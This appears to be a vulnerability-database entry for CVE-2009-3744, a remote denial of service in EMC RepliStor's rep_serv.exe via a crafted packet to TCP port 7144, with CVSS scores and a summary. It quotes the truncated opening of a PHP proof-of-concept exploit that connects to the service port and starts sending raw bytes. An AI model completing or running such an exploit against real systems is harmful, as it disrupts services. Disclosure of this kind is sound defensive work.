5
CVSSv2

CVE-2009-3744

Published: 22/10/2009 Updated: 10/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

rep_serv.exe 6.3.1.3 in the server in EMC RepliStor allows remote malicious users to cause a denial of service via a crafted packet to TCP port 7144.

Vulnerable Product Search on Vulmon Subscribe to Product

emc replistor 6.3.1.3

Exploits

<?php /* EMC RepliStor Server (rep_servexe) 6313 remote denial of service poc by Nine:Situations:Group::bellick */ $host = "19216801"; $port = 7144; $_sock = fsockopen($host, $port, $errno, $errstr, 2); if (!$fp) { echo "$errstr ($errno)\n"; } else { $_p = "\x54\x93 ...